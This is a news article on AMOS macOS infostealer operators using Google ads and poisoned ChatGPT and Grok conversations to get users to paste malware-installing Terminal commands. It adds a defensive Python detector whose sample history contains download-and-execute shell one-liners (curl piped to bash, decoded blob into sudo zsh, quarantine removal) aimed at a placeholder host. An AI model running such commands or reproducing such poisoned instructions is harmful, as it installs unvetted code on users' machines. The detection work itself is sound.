- AMOS operators used malvertising and poisoned ChatGPT/Grok conversations to push Mac malware
- Fake “free disk space” instructions tricked users into running Terminal commands that installed AMOS
- The campaign abused Google ads and trusted AI platforms, increasing credibility and infection success
AtomicOS (AMOS) criminals are using a combination of malvertising and GenAI response poisoning to trick macOS users into downloading malware. This is according to cybersecurity researchers at Huntress, who claim not only to have observed the attacks in the wild, but also to have replicated the same results with other victims.
In a blog post published earlier this week, Huntress said that AMOS maintainers first set up two AI conversations: one with ChatGPT and one with Grok.
These conversations were about freeing up disk space on a macOS device and included instructions on how to do it. However, the instructions were bogus and instead asked the user to download the Terminal app and enter a command that would download and run the AMOS infostealer.
A twist to ClickFix
From there, they bought ad space on Google to promote these conversations. That way, when a user searches for something like “how to clean up disk space on macOS”, these poisoned conversations appear at the very top of the search engine results page.
Apparently the trick worked, because Huntress was brought in to investigate a case of AMOS infections. For those unaware, AMOS is a notorious macOS infostealer capable of stealing sensitive data, passwords, cryptocurrency wallet information and more.
The scam works similarly to ClickFix, another technique that tricks victims into running Terminal commands. The only difference is that in this case the victims are actually proactively looking for a solution to a real problem instead of a non-existent one. What makes this campaign more dangerous is that it abuses not one, but three trusted services – Google’s search engine, ChatGPT and Grok’s Answers.
At the end of the day, both conversations are hosted on their respective platforms, increasing the perceived legitimacy of both instructions. However, it is unclear how AMOS operators managed to get ChatGPT and Grok to display these results.
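A defender-side illustration of the paste-and-run pattern described above, added here and not taken from Huntress or the original article: a Python triage pass over shell history or process command lines that flags download-and-execute one-liners. The article does not reproduce the actual command, so the rules, the sample lines and the `example.invalid` host are constructed assumptions.

```python
import re

# Constructed sample lines; example.invalid is a placeholder host, not an indicator.
SAMPLE_HISTORY = [
    ": 1765000000:0;du -sh ~/Library/Caches",
    "curl -fsSL https://example.invalid/tool.dmg -o ~/Downloads/tool.dmg",
    ": 1765000100:0;curl -fsSL https://example.invalid/cleanup.sh | bash",
    "echo Y29uc3RydWN0ZWQ= | base64 -d | sudo zsh",
    '/bin/bash -c "$(curl -fsSL https://example.invalid/free-space)"',
    "curl -s -o /tmp/helper https://example.invalid/h && chmod +x /tmp/helper && /tmp/helper",
    "xattr -d com.apple.quarantine /tmp/helper",
]

INTERPRETERS = {"sh", "bash", "zsh", "python3", "perl", "osascript"}
HIST_PREFIX = re.compile(r"^: \d+:\d+;")  # zsh EXTENDED_HISTORY timestamp prefix
FETCH = re.compile(r"\b(?:curl|wget)\b")
DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
SUBST = re.compile(r"\b(?:ba|z)?sh\b[^|;&]*(?:\$\(|<\()\s*(?:curl|wget)\b")
DROP = re.compile(r"\b(?:curl|wget)\b[^|;&]*?\s-[oO]\s+(\S+)")

def _prog(stage):  # program name of one pipeline stage, ignoring sudo and path
    words = stage.split()
    while words and words[0] in ("sudo", "nohup", "exec"):
        words.pop(0)
    return words[0].rsplit("/", 1)[-1] if words else ""

def findings(line):  # sorted names of the rules that one command line triggers
    cmd = HIST_PREFIX.sub("", line.strip())
    hits = set()
    stages = cmd.split("|")
    for i in range(1, len(stages)):
        if _prog(stages[i]) in INTERPRETERS:  # something is piped into a shell
            upstream = "|".join(stages[:i])
            if FETCH.search(upstream):
                hits.add("download piped to interpreter")
            if DECODE.search(upstream):
                hits.add("decoded blob piped to interpreter")
    if SUBST.search(cmd):  # bash -c "$(curl ...)" or bash <(curl ...)
        hits.add("download substituted into shell")
    m = DROP.search(cmd)   # file saved with -o/-O, then chmod'ed in the same line
    if m and re.search(r"\bchmod\s+\S+\s+" + re.escape(m.group(1)), cmd):
        hits.add("downloaded file made executable")
    if re.search(r"\bxattr\b", cmd) and "com.apple.quarantine" in cmd:
        hits.add("quarantine attribute removed")
    return sorted(hits)

if __name__ == "__main__":
    for entry in SAMPLE_HISTORY:
        print(findings(entry) or "ok", "<-", entry)
```

Matches are triage leads rather than verdicts, since installers and administrators also use these patterns legitimately.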
Via Apple Insider